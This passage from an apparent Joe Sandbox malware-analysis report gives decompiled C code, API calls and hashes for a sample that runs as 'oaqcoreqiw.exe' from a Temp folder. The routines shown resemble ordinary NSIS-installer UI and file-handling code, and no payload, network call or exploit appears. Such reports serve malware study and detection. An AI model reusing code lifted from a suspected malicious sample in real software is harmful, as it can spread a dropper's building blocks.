                                                  • lstrcatW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                  • lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Directory$SystemWindowslstrcatlstrlen
                                                  • String ID: "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 4260037668-2084297249
                                                  • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                  • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                  • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                  • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                  0x004056d0
                                                  0x004056da
                                                  0x004056df
                                                  0x004056e5
                                                  0x004056f0
                                                  0x004056f3
                                                  0x004056f6
                                                  0x004056fc
                                                  0x004056fc
                                                  0x00405702
                                                  0x0040570a
                                                  0x0040570d
                                                  0x0040572a
                                                  0x0040572e
                                                  0x00405737
                                                  0x00405737
                                                  0x00405741
                                                  0x0040574a
                                                  0x00405756
                                                  0x0040575d
                                                  0x00405761
                                                  0x00405764
                                                  0x00405777
                                                  0x00405785
                                                  0x00405785
                                                  0x00405789
                                                  0x0040578b
                                                  0x0040578e
                                                  0x00000000
                                                  0x0040578e
                                                  0x0040570f
                                                  0x00405717
                                                  0x0040571f
                                                  0x00405725
                                                  0x00000000
                                                  0x00405725
                                                  0x0040571f
                                                  0x0040570d
                                                  0x0040579a

                                                  APIs
                                                  • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                  • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                  • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                  • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                    • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                    • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                  • String ID: ('B
                                                  • API String ID: 1495540970-2332581011
                                                  • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                  • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                  • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                  • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                  0x0040463d
                                                  0x004046f3
                                                  0x00000000
                                                  0x004046f3
                                                  0x0040464e
                                                  0x00404652
                                                  0x00000000
                                                  0x0040466c
                                                  0x0040466c
                                                  0x00404675
                                                  0x00000000
                                                  0x00000000
                                                  0x00404677
                                                  0x00404683
                                                  0x00404686
                                                  0x00404686
                                                  0x0040468c
                                                  0x00404692
                                                  0x00404692
                                                  0x0040469e
                                                  0x004046a4
                                                  0x004046ab
                                                  0x004046ae
                                                  0x004046b1
                                                  0x004046b3
                                                  0x004046b3
                                                  0x004046bb
                                                  0x004046c1
                                                  0x004046c1
                                                  0x004046cb
                                                  0x004046d0
                                                  0x004046d3
                                                  0x004046d8
                                                  0x004046db
                                                  0x004046db
                                                  0x004046eb
                                                  0x004046eb
                                                  0x00000000
                                                  0x004046ee

                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                  • GetSysColor.USER32(00000000), ref: 00404686
                                                  • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                  • SetBkMode.GDI32(?,?), ref: 0040469E
                                                  • GetSysColor.USER32(?), ref: 004046B1
                                                  • SetBkColor.GDI32(?,?), ref: 004046C1
                                                  • DeleteObject.GDI32(?), ref: 004046DB
                                                  • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                  • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                  • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                  • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                  0x004026ec
                                                  0x004026ee
                                                  0x004026f1
                                                  0x004026f3
                                                  0x004026f6
                                                  0x004026fb
                                                  0x004026ff
                                                  0x00402702
                                                  0x00402705
                                                  0x00402c2a
                                                  0x00402c2d
                                                  0x0040270b
                                                  0x0040270b
                                                  0x00402712
                                                  0x00402714
                                                  0x00402714
                                                  0x0040271a
                                                  0x0040287e
                                                  0x0040287e
                                                  0x00402881
                                                  0x00402886
                                                  0x004015b6
                                                  0x0040292e
                                                  0x0040292e
                                                  0x00000000
                                                  0x00402720
                                                  0x00402721
                                                  0x0040272c
                                                  0x0040272f
                                                  0x0040273b
                                                  0x0040273f
                                                  0x004027d7
                                                  0x004027ef
                                                  0x004027ff
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402745
                                                  0x00402745
                                                  0x00402748
                                                  0x00402749
                                                  0x0040274c
                                                  0x00402751
                                                  0x00402758
                                                  0x00402760
                                                  0x00000000
                                                  0x00402766
                                                  0x00402766
                                                  0x0040276b
                                                  0x00000000
                                                  0x00402771
                                                  0x00402771
                                                  0x00402779
                                                  0x0040277c
                                                  0x0040277f
                                                  0x0040283a
                                                  0x00402841
                                                  0x00402785
                                                  0x0040278b
                                                  0x00402797
                                                  0x00402801
                                                  0x00402801
                                                  0x00402799
                                                  0x00402799
                                                  0x0040279c
                                                  0x0040279e
                                                  0x0040279e
                                                  0x0040279e
                                                  0x004027a1
                                                  0x004027a6
                                                  0x004027a9
                                                  0x00000000
                                                  0x00000000
                                                  0x004027ab
                                                  0x004027ae
                                                  0x004027bc
                                                  0x004027c2
                                                  0x004027d0
                                                  0x00000000
                                                  0x004027d2
                                                  0x00000000
                                                  0x004027d2
                                                  0x00000000
                                                  0x004027d0
                                                  0x0040279e
                                                  0x00402804
                                                  0x00402807
                                                  0x00000000
                                                  0x00402809
                                                  0x0040280e
                                                  0x0040284f
                                                  0x00402871
                                                  0x00402878
                                                  0x0040285d
                                                  0x0040285d
                                                  0x00402860
                                                  0x00402863
                                                  0x00402866
                                                  0x00402866
                                                  0x00000000
                                                  0x00402817
                                                  0x00402817
                                                  0x0040281a
                                                  0x0040281d
                                                  0x00402823
                                                  0x00402827
                                                  0x0040282a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040282a
                                                  0x0040280e
                                                  0x00402807
                                                  0x0040277f
                                                  0x0040276b
                                                  0x00402760
                                                  0x00000000
                                                  0x0040282c
                                                  0x0040282c
                                                  0x0040282f
                                                  0x00402838
                                                  0x00000000
                                                  0x0040272f
                                                  0x0040271a
                                                  0x00402c33
                                                  0x00402c39

                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                    • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                  • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                  • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                  • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                  0x004068f1
                                                  0x004068fa
                                                  0x00406911
                                                  0x00406911
                                                  0x00406918
                                                  0x00406924
                                                  0x00406924
                                                  0x00406927
                                                  0x0040692a
                                                  0x0040692f
                                                  0x00406931
                                                  0x0040693a
                                                  0x0040693e
                                                  0x0040695b
                                                  0x00406963
                                                  0x00406963
                                                  0x00406968
                                                  0x0040696a
                                                  0x0040696d
                                                  0x00406972
                                                  0x00406973
                                                  0x00406977
                                                  0x00406977
                                                  0x00406978
                                                  0x0040697f
                                                  0x00406981
                                                  0x00406988
                                                  0x00000000
                                                  0x00000000
                                                  0x00406990
                                                  0x00406996
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406996
                                                  0x0040699b

                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406952
                                                  • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406961
                                                  • CharNextW.USER32(?,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406966
                                                  • CharPrevW.USER32(?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406979
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 589700163-1439852002
                                                  • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                  • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                  • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                  • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                                                  0x0040303d
                                                  0x0040303f
                                                  0x00403046
                                                  0x00403049
                                                  0x00403049
                                                  0x0040304f
                                                  0x00000000
                                                  0x0040304f
                                                  0x0040305d
                                                  0x00000000
                                                  0x00403060
                                                  0x00403067
                                                  0x00403073
                                                  0x0040307b
                                                  0x004030b9
                                                  0x004030c2
                                                  0x00000000
                                                  0x004030c7
                                                  0x00403084
                                                  0x00403095
                                                  0x00000000
                                                  0x004030a3
                                                  0x00403084
                                                  0x004030cf

                                                  APIs
                                                  • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                  • GetTickCount.KERNEL32 ref: 00403067
                                                  • wsprintfW.USER32 ref: 00403095
                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                    • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                    • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                  • CreateDialogParamW.USER32 ref: 004030B9
                                                  • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                    • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
